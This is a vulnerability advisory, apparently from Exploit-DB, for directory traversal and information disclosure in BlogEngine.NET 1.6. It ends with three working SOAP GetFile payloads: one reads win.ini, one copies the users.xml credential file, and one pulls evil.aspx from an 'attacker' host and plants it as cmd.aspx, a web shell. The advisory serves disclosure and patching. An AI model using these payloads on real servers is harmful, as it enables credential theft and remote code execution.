BlogEngine.NET Directory Traversal and Information Disclosure Vulnerabilities

vendor:

BlogEngine.NET

by:

SecurityFocus

7.5

CVSS

HIGH

Directory Traversal and Information Disclosure

22, 200

CWE

Product Name: BlogEngine.NET

Affected Version From: 1.6

Affected Version To: 1.6

Patch Exists: YES

Related CWE: N/A

CPE: a:dotnetblogengine:blogengine.net

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

BlogEngine.NET Directory Traversal and Information Disclosure Vulnerabilities

BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting the issues may allow an attacker to obtain sensitive information and upload arbitrary files to the webserver that could aid in further attacks.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45681/info

BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting the issues may allow an attacker to obtain sensitive information and upload arbitrary files to the webserver that could aid in further attacks.

BlogEngine.NET 1.6 is vulnerable. 

The following example SOAP requests are available:

1. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\Windows\win.ini</source>
<destination>string</destination>
</GetFile>

2. <GetFile xmlns="http://dotnetblogengine.net/">
<source>c:\webroot\blog\App_Data\users.xml</source>
<destination>../../aa.txt</destination>
</GetFile>

3. <GetFile xmlns="http://dotnetblogengine.net/">
<source>http://attacker/evil.aspx</source>
<destination>/../../cmd.aspx</destination>
</GetFile>